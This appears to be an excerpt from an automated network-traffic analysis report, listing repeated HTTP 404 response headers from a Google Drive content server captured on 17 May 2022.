                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:29 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Mm99I63QtTPFJxaKXlAXDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:29 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-NdGPl7354m7+aXfTHlgQpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:29 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-B6zRWkto26J+7xP5gfl04g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:29 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-QG+lboCf5Gi2EGCEUGQtgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:29 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-koTFLqWozZy+Ww6+7yNP6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:30 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-0J28G3A9p5uIE6qNaKXkRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:30 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: script-src 'report-sample' 'nonce-vgPgSwZm9TyOkviYYPxWuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:30 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-yUUzsv5/pUezuWYaCDayzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:30 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-CRUv/+9L5C5IdnzQBSEETg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:30 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0ukD2zf5kuie4qKeRy9/LA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:30 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-yjMvikp6904irAGreIkEXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:30 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-Iuc8SNgF6jAt8go9N6kgtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:30 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-YD+64BYnDAy5YoAelAiMTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:31 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RyHf1bHbe8B35gh2IlfmPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:31 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-7j1EiDApTKiJQzL0kuDB2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:31 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VqVD05ZasRXiN2LS7euYMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:31 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Qjb32Z4hcdE5/PfJxLLILw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:31 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-R5kSp3pCjAZBS0/PtjhlOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:31 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GLQbmHedOpEGGP0kWp1hRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
